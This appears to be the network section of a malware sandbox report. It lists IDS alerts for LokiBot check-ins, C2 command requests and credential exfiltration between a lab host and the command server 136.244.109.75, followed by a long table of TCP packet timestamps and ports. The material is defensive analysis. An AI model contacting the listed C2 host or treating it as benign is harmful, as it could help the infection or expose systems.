                          04/17/24-03:18:38.899573TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.5136.244.109.75
                          04/17/24-03:17:36.230211TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.5136.244.109.75
                          04/17/24-03:17:25.655732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.5136.244.109.75
                          04/17/24-03:16:50.877994TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970580192.168.2.5136.244.109.75
                          04/17/24-03:18:47.882152TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.5136.244.109.75
                          04/17/24-03:18:10.084965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976580192.168.2.5136.244.109.75
                          04/17/24-03:16:58.235959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.5136.244.109.75
                          04/17/24-03:17:58.145128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.5136.244.109.75
                          04/17/24-03:17:37.986053TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.5136.244.109.75
                          04/17/24-03:17:48.803719TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.5136.244.109.75
                          04/17/24-03:16:50.877994TCP2025381ET TROJAN LokiBot Checkin4970580192.168.2.5136.244.109.75
                          04/17/24-03:17:07.139176TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.5136.244.109.75
                          04/17/24-03:17:53.372679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.5136.244.109.75
                          04/17/24-03:17:48.803719TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.5136.244.109.75
                          04/17/24-03:16:53.759072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970780192.168.2.5136.244.109.75
                          04/17/24-03:17:50.302449TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.5136.244.109.75
                          04/17/24-03:17:41.291392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.5136.244.109.75
                          04/17/24-03:17:24.136611TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.5136.244.109.75
                          04/17/24-03:18:41.923839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.5136.244.109.75
                          04/17/24-03:17:10.136681TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.5136.244.109.75
                          04/17/24-03:17:58.145128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.5136.244.109.75
                          04/17/24-03:18:10.084965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.5136.244.109.75
                          04/17/24-03:17:13.162928TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.5136.244.109.75
                          04/17/24-03:18:17.867642TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.5136.244.109.75
                          04/17/24-03:18:38.899573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.5136.244.109.75
                          04/17/24-03:18:38.899573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.5136.244.109.75
                          04/17/24-03:18:52.381113TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.5136.244.109.75
                          04/17/24-03:17:31.711088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.5136.244.109.75
                          04/17/24-03:18:13.442138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.5136.244.109.75
                          04/17/24-03:18:20.835118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.5136.244.109.75
                          04/17/24-03:17:20.757055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.5136.244.109.75
                          04/17/24-03:18:01.176692TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.5136.244.109.75
                          04/17/24-03:17:31.711088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.5136.244.109.75
                          04/17/24-03:18:11.616140TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.5136.244.109.75
                          04/17/24-03:17:08.603347TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.5136.244.109.75
                          04/17/24-03:17:20.757055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.5136.244.109.75
                          04/17/24-03:18:11.616140TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.5136.244.109.75
                          04/17/24-03:17:51.797146TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.5136.244.109.75
                          04/17/24-03:17:11.695407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.5136.244.109.75
                          04/17/24-03:17:33.230598TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.5136.244.109.75
                          04/17/24-03:17:30.128575TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.5136.244.109.75
                          04/17/24-03:17:30.128575TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.5136.244.109.75
                          04/17/24-03:18:53.924913TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.5136.244.109.75
                          04/17/24-03:18:37.366005TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.5136.244.109.75
                          04/17/24-03:18:53.924913TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.5136.244.109.75
                          04/17/24-03:18:32.922641TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.5136.244.109.75
                          04/17/24-03:18:23.842884TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.5136.244.109.75
                          04/17/24-03:18:28.314689TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.5136.244.109.75
                          04/17/24-03:18:35.861538TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.5136.244.109.75
                          04/17/24-03:18:40.424546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.5136.244.109.75
                          04/17/24-03:18:44.899678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978880192.168.2.5136.244.109.75
                          04/17/24-03:17:54.967221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.5136.244.109.75
                          04/17/24-03:17:01.257517TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.5136.244.109.75
                          04/17/24-03:17:45.817567TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.5136.244.109.75
                          04/17/24-03:18:14.912121TCP2025381ET TROJAN LokiBot Checkin4976880192.168.2.5136.244.109.75
                          04/17/24-03:18:49.380266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.5136.244.109.75
                          04/17/24-03:18:26.814059TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.5136.244.109.75
                          04/17/24-03:18:31.393355TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.5136.244.109.75
                          04/17/24-03:17:47.288202TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.5136.244.109.75
                          04/17/24-03:17:01.257517TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.5136.244.109.75
                          04/17/24-03:16:56.772780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.5136.244.109.75
                          04/17/24-03:18:44.899678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.5136.244.109.75
                          04/17/24-03:18:04.154071TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.5136.244.109.75
                          04/17/24-03:16:56.772780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.5136.244.109.75
                          04/17/24-03:18:34.395592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.5136.244.109.75
                          04/17/24-03:17:17.652364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.5136.244.109.75
                          04/17/24-03:18:25.351055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.5136.244.109.75
                          04/17/24-03:18:05.666467TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.5136.244.109.75
                          04/17/24-03:16:52.374211TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970680192.168.2.5136.244.109.75
                          04/17/24-03:17:25.655732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.5136.244.109.75
                          04/17/24-03:16:52.374211TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970680192.168.2.5136.244.109.75
                          04/17/24-03:17:34.754471TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.5136.244.109.75
                          04/17/24-03:17:34.754471TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.5136.244.109.75
                          04/17/24-03:17:56.686682TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.5136.244.109.75
                          04/17/24-03:17:27.158635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.5136.244.109.75
                          04/17/24-03:18:34.395592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.5136.244.109.75
                          04/17/24-03:17:16.164912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.5136.244.109.75
                          04/17/24-03:17:04.956657TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.5136.244.109.75
                          04/17/24-03:18:16.378463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.5136.244.109.75
                          04/17/24-03:17:36.230211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.5136.244.109.75
                          04/17/24-03:17:59.618244TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.5136.244.109.75
                          04/17/24-03:17:25.655732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.5136.244.109.75
                          04/17/24-03:18:16.378463TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.5136.244.109.75
                          04/17/24-03:18:25.351055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.5136.244.109.75
                          04/17/24-03:17:16.164912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.5136.244.109.75
                          TimestampSource PortDest PortSource IPDest IP
                          Apr 17, 2024 03:16:50.671928883 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:50.875370026 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:50.875492096 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:50.877994061 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:51.081312895 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:51.081429005 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:51.284851074 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016489029 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016509056 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016521931 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016536951 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016551971 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016565084 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016578913 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016592979 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016601086 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.016601086 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.016608000 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016623020 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.016666889 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.016666889 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.016666889 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.016688108 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.168430090 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.219883919 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.219902039 CEST8049705136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.220046997 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.220047951 CEST4970580192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.372294903 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.372375965 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.374211073 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.578284025 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:52.578356028 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:52.782258034 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501743078 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501759052 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501770973 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501782894 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501804113 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.501842976 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.501853943 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501866102 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501877069 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501888990 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501899958 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.501900911 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501916885 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.501936913 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.501962900 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.501997948 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.553929090 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.705858946 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.705873013 CEST8049706136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.706012011 CEST4970680192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.757080078 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.757159948 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.759072065 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:53.962362051 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:53.962456942 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:54.165700912 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978631020 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978657961 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978676081 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978694916 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978717089 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978729010 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:54.978738070 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978756905 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978775024 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978775024 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:54.978775024 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:54.978792906 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978806019 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:54.978816986 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:54.978821993 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:54.978833914 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:54.978859901 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:55.111939907 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:55.182153940 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:55.182173014 CEST8049707136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:55.182204962 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:55.182233095 CEST4970780192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:55.315145016 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:55.315280914 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:55.317147970 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:55.520354986 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:55.520426035 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:55.723548889 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425553083 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425570011 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425580978 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425592899 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425604105 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425616026 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425627947 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425638914 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425652027 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425663948 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.425815105 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:56.425816059 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:56.425919056 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:56.563469887 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:56.629436016 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.629451036 CEST8049708136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.629667044 CEST4970880192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:56.770906925 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.770998955 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:56.772779942 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:56.980127096 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:56.980240107 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:57.187807083 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881382942 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881400108 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881409883 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881419897 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881434917 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881445885 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881458044 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881469965 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881483078 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881496906 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:57.881496906 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:57.881567001 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:57.881659031 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:58.030112028 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:58.089013100 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:58.089027882 CEST8049709136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:58.089083910 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:58.089116096 CEST4970980192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:58.234025002 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:58.234265089 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:58.235959053 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:58.439713001 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:58.440047979 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:58.643835068 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342629910 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342648029 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342659950 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342686892 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342700005 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342713118 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342725992 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342741013 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.342782021 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342794895 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342804909 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.342812061 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.342828035 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.342865944 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.343352079 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.499667883 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.546618938 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.546634912 CEST8049710136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.546834946 CEST4971080192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.707048893 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.707150936 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.708946943 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:16:59.916194916 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:16:59.916275024 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:00.123641014 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.888947010 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.888991117 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889027119 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889061928 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889098883 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889137983 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889229059 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889257908 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:00.889257908 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:00.889266014 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889303923 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889316082 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:00.889342070 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:00.889388084 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:00.889403105 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:01.046714067 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:01.096741915 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:01.096782923 CEST8049711136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:01.096888065 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:01.096888065 CEST4971180192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:01.254400969 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:01.254596949 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:01.257517099 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:01.465795994 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:01.465902090 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:01.673502922 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374149084 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374207973 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374247074 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374279976 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.374284029 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374322891 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374337912 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.374361992 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374408960 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.374417067 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374433994 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.374454975 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374475956 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.374490976 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374510050 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.374531984 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.374542952 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.374577999 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.582324982 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.582391024 CEST8049712136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.582427979 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.582463026 CEST4971280192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.773025990 CEST4971380192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.981182098 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:02.981518030 CEST4971380192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:02.984312057 CEST4971380192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:03.192332029 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:03.192660093 CEST4971380192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:03.400685072 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:04.104320049 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:04.104433060 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:04.104473114 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:04.104511023 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:04.104554892 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:04.104598045 CEST8049713136.244.109.75192.168.2.5
                          Apr 17, 2024 03:17:04.104619980 CEST4971380192.168.2.5136.244.109.75
                          Apr 17, 2024 03:17:04.104620934 CEST4971380192.168.2.5136.244.109.75
